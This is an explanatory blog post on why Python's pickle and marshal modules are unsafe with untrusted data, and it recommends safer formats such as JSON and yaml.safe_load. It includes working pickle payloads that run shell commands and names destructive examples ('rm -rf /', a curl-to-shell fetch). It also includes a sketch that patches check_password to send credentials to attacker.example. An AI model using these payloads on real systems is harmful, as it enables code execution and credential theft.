Security of Python’s pickle and marshal modules
Written on 14 Nov 2014
Both the pickle and marshal modules come with a similar big red warning:
The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
The marshal module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source.
Let’s see why.
Marshal
There are no known ways to exploit marshal. I wasn’t able to execute code through marshal.loads(), and looking at the marshal.c source code, I don’t see an immediately obvious way.
So why is this warning here? The BDFL explains:
BTW the warning for marshal is legit – the C code that unpacks marshal data has not been carefully analyzed against buffer overflows and so on. Remember the first time someone broke into a system through a malicious JPEG? The same could happen with marshal. Seriously.
I recommend you read the rest of the discussion; it shows a bug where unmarshalling data causes Python to segfault, which has been fixed since Python 2.5 (such a bug can, potentially, be abused to execute code). Other bugs may still exist, though!
Furthermore, the marshal docs mention:
This is not a general “persistence” module. [..] The marshal module exists mainly to support reading and writing the “pseudo-compiled” code for Python modules of .pyc files.
So it’s not even designed to persist data in a reliable way.
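For completeness, here’s a minimal sketch of what marshal is actually meant for: round-tripping a code object, which is roughly what the interpreter does when writing and reading .pyc files (the snippet itself is just an illustration):

import marshal

# Compile a snippet to a code object; this is the kind of value
# marshal is designed to serialize.
code = compile("print('hello from a marshalled code object')", "<example>", "exec")

data = marshal.dumps(code)      # the byte format that makes up the body of a .pyc file
restored = marshal.loads(data)  # back to a code object
exec(restored)                  # prints the message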
Pickle
You can easily execute arbitrary code with pickle. For example:
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin data download home lib64 mnt proc run srv tmp usr var
boot dev etc lib lost+found opt root sbin sys ubuntu vagrant
0
This is a harmless ls /, but it could just as well be a less harmless rm -rf /, or a curl http://example.com/hack.sh | sh.
You can see how this works by using the pickletools module:
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'ls /'
20: t TUPLE (MARK at 11)
21: R REDUCE
22: . STOP
pickle.py has some comments on what these opcodes mean:
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
MARK = b'(' # push special markobject on stack
STRING = b'S' # push string; NL-terminated string argument
TUPLE = b't' # build tuple from topmost stack items
REDUCE = b'R' # apply callable to argtuple, both on stack
STOP = b'.' # every pickle ends with STOP
Most of it is self-explanatory; with GLOBAL you can get any function, and with REDUCE you call it.
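You don’t have to handcraft these opcodes, by the way: pickle happily generates an equivalent GLOBAL/TUPLE/REDUCE sequence for any object whose __reduce__ returns a callable plus its arguments. A minimal sketch (the class name is just for illustration):

import os
import pickle
import pickletools

class Exploit:
    # pickle calls __reduce__ to ask how to recreate this object; the
    # answer here is "call os.system('ls /')", which is exactly what
    # happens on pickle.loads().
    def __reduce__(self):
        return (os.system, ("ls /",))

payload = pickle.dumps(Exploit(), protocol=0)
pickletools.dis(payload)  # a GLOBAL/TUPLE/REDUCE sequence much like the one above
                          # (the module may show up as posix rather than os)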
Since Python is pretty dynamic, you can also use this to monkey-patch a program at run time. For example, you could replace the check_password function with one that uploads the password to a server.
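A hedged sketch of what such a payload could look like on Python 3, where exec is an ordinary builtin and can therefore be the callable returned by __reduce__; myapp.auth, check_password, and the attacker URL are made-up names:

import pickle

# Hypothetical target: assume the victim application has a module
# myapp.auth with a check_password(user, password) function.
patch_source = """
import myapp.auth, urllib.request

_real = myapp.auth.check_password

def _evil(user, password):
    # leak the credentials, then behave normally so nobody notices
    urllib.request.urlopen("http://attacker.example/steal",
                           data=("%s:%s" % (user, password)).encode())
    return _real(user, password)

myapp.auth.check_password = _evil
"""

class Patch:
    def __reduce__(self):
        return (exec, (patch_source,))

payload = pickle.dumps(Patch())
# pickle.loads(payload) in the victim process silently replaces
# check_password for the rest of that process's lifetime.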
So what is secure?
XML, JSON, MessagePack, ini files, or perhaps something else. It depends on which format best fits your situation.
Has the code that parses those formats been “carefully analyzed against buffer overflows and so on”? Who knows. Most code hasn’t, and C makes it easy to do things wrong.[1] Even Python code may be vulnerable, as it may call functions implemented in C that are.
There have been problems with Python’s JSON module. But at the same time, it’s used a lot in public-facing apps, so it’s probably safe. It’ll certainly be safer than marshal, since this was only designed for .pyc files and explicitly comes with a “not audited!” warning.
This is no guarantee. Remember that YAML security hole a while back that caused every Ruby on Rails application in the world to be vulnerable to arbitrary code execution? Oops! And this wasn’t even a subtle buffer overflow, but a much more obvious problem.
You should not use yaml’s load() function, as it has the same problems as Ruby’s YAML. Use safe_load() instead.
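A short illustration, assuming PyYAML is installed: the default Loader will happily construct Python objects from !!python/... tags, while safe_load() sticks to plain data types:

import yaml  # PyYAML

evil = "!!python/object/apply:os.system ['ls /']"

# yaml.load(evil, Loader=yaml.Loader)  # would run "ls /" via the unsafe loader

yaml.safe_load("{user: alice, admin: false}")  # {'user': 'alice', 'admin': False}
yaml.safe_load(evil)                           # raises yaml.constructor.ConstructorError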
Conclusion
The warning in the pickle module is very much warranted (it should be stated more strongly), while the warning above the marshal module is more of a “this code was not designed with security in mind”-type of warning, but actually exploiting it is not as easy and relies on the hypothetical existence of unknown bugs. Still, you’re probably better off using something else.
[1] There really ought to be a “carefully analyzed against buffer overflows and so on” seal of trust for open source projects. Yeah, you can shell out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is some effort to do this after the OpenSSL Heartbleed clusterfuck earlier this year in the form of the Core Infrastructure Initiative, but its scope and budget are limited (but it’s young, and may gain traction in a few years).